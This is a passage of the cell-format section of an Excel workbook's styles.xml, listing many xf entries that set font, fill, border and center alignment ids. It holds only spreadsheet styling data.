    <xf numFmtId="0" fontId="6" fillId="33" borderId="80" xfId="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="6" fillId="33" borderId="81" xfId="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="6" fillId="34" borderId="82" xfId="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="6" fillId="34" borderId="80" xfId="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="6" fillId="34" borderId="80" xfId="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="6" fillId="34" borderId="81" xfId="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="65" fillId="2" borderId="78" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="6" fillId="3" borderId="85" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="6" fillId="3" borderId="86" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="59" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="52" fillId="0" borderId="0" xfId="0" applyFont="1"/>
    <xf numFmtId="0" fontId="5" fillId="24" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="center"/>
    </xf>
    <xf numFmtId="0" fontId="5" fillId="25" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="5" fillId="0" borderId="3" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="right" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="5" fillId="0" borderId="9" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="right" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="6" fillId="3" borderId="31" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="22" fillId="3" borderId="6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28" fillId="3" borderId="31" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="8" fillId="3" borderId="61" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="8" fillId="3" borderId="62" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="27" fillId="3" borderId="63" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="41" fillId="3" borderId="31" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="42" fillId="16" borderId="31" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="42" fillId="16" borderId="33"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43" fillId="3" borderId="31" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="22" fillId="3" borderId="31" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="34" fillId="3" borderId="31"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7" fillId="3" borderId="63" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="7" fillId="3" borderId="33" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="27" fillId="3" borderId="31" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="42" fillId="3" borderId="31"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6" fillId="10" borderId="65" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="6" fillId="10" borderId="13" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="42" fillId="10" borderId="13" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="6" fillId="11" borderId="66" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="6" fillId="11" borderId="67" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="6" fillId="11" borderId="13" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="42" fillId="11" borderId="13" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="6" fillId="12" borderId="66" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="6" fillId="12" borderId="67" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="6" fillId="12" borderId="13" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="42" fillId="12" borderId="13" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="6" fillId="13" borderId="66" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="6" fillId="13" borderId="67" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="6" fillId="13" borderId="13" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="42" fillId="13" borderId="13" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="43" fillId="17" borderId="66" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="43" fillId="17" borderId="3" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="43" fillId="17" borderId="13" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="41" fillId="19" borderId="13" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="43" fillId="19" borderId="13" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="42" fillId="13" borderId="55" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="23" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="27" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="28" fillId="2" borderId="40" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="29" fillId="2" borderId="41" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="28" fillId="2" borderId="42" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="29" fillId="2" borderId="42" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="30" fillId="2" borderId="42" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="31" fillId="2" borderId="44" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="31" fillId="2" borderId="41" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="32" fillId="2" borderId="40" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="29" fillId="2" borderId="43" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="29" fillId="2" borderId="40" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="28" fillId="2" borderId="41" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="34" fillId="2" borderId="41" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="35" fillId="2" borderId="43" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="34" fillId="2" borderId="42" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="36" fillId="2" borderId="42" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="37" fillId="2" borderId="42" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="37" fillId="2" borderId="44" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="6" fillId="2" borderId="46" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="36" fillId="2" borderId="46" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="29" fillId="2" borderId="47" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="29" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="22" fillId="3" borderId="48"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22" fillId="3" borderId="30"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28" fillId="3" borderId="30" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="7" fillId="3" borderId="49" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="7" fillId="3" borderId="50"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27" fillId="3" borderId="51" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="42" fillId="16" borderId="32"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43" fillId="3" borderId="30" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="34" fillId="3" borderId="30" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="22" fillId="3" borderId="32" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="7" fillId="3" borderId="51" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="6" fillId="10" borderId="53" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="6" fillId="10" borderId="54" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="6" fillId="10" borderId="55" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="42" fillId="10" borderId="55" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="6" fillId="11" borderId="56"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1" borderId="55" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="42" fillId="11" borderId="55" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="6" fillId="12" borderId="56" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="6" fillId="12" borderId="57" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="6" fillId="12" borderId="55" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="42" fillId="12" borderId="55" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="6" fillId="13" borderId="56" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="6" fillId="13" borderId="57" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="6" fillId="13" borderId="55" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="43" fillId="17" borderId="56" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="43" fillId="17" borderId="58" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="43" fillId="17" borderId="55" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="41" fillId="18" borderId="55" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="41" fillId="19" borderId="55" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="7" fillId="3" borderId="61" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="7" fillId="3" borderId="62" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="44" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="22" fillId="3" borderId="33" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="46" fillId="11" borderId="13" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="46" fillId="12" borderId="13" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="7" fillId="3" borderId="33" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="45" fillId="19" borderId="13" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="47" fillId="11" borderId="66" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="47" fillId="11" borderId="67" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="47" fillId="11" borderId="13" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="48" fillId="19" borderId="13" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="7" fillId="3" borderId="31" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="49" fillId="19" borderId="13" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="7" fillId="3" borderId="63" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="3" fontId="7" fillId="3" borderId="31" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="50" fillId="3" borderId="31" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="51" fillId="3" borderId="31" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="21" fillId="3" borderId="61" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="21" fillId="3" borderId="62" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="3" fontId="6" fillId="11" borderId="66" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="3" fontId="6" fillId="11" borderId="67" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="54" fillId="16" borderId="31" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="3" fontId="7" fillId="3" borderId="61" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="3" fontId="7" fillId="3" borderId="62" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="3" fontId="6" fillId="3" borderId="31" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="54" fillId="3" borderId="63" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="66" fillId="20" borderId="69" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="7" fillId="21" borderId="69" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="20" borderId="69" xfId="0" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="9" fillId="20" borderId="70" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="9" fillId="20" borderId="69" xfId="0" applyFont="1" applyFill="1" applyBorder="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0" fontId="56" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="9" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="5" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="58" fillId="0" borderId="1" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="52" fillId="0" borderId="2" xfId="0" applyFont="1" applyBorder="1"/>
    <xf numFmtId="0" fontId="52" fillId="0" borderId="71" xfId="0" applyFont="1" applyBorder="1"/>
    <xf numFmtId="0" fontId="59" fillId="0" borderId="1" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="52" fillId="0" borderId="72" xfId="0" applyFont="1" applyBorder="1"/>
    <xf numFmtId="0" fontId="52" fillId="0" borderId="73" xfId="0" applyFont="1" applyBorder="1"/>
    <xf numFmtId="0" fontId="52" fillId="0" borderId="74" xfId="0" applyFont="1" applyBorder="1"/>
    <xf numFmtId="0" fontId="5" fillId="22" borderId="75" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="5" fillId="22" borderId="61" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="5" fillId="22" borderId="76" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="5" fillId="23" borderId="75" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="52" fillId="0" borderId="61" xfId="0" applyFont="1" applyBorder="1"/>
    <xf numFmtId="0" fontId="52" fillId="0" borderId="76" xfId="0" applyFont="1" applyBorder="1"/>
    <xf numFmtId="0" fontId="5" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment horizontal="center"/>
    </xf>
    <xf numFmtId="0" fontId="5" fillId="24" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center"/>
    </xf>
    <xf numFmtId="0" fontId="5" fillId="25" borderId="72" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="5" fillId="25" borderId="73" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="5" fillId="25" borderId="74" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="56" fillId="0" borderId="0" xfId="0" applyFont="1"/>
    <xf numFmtId="0" fontId="9" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="63" fillId="0" borderId="0" xfId="0" applyFont="1"/>
    <xf numFmtId="0" fontId="9" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="55" fillId="20" borderId="88" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
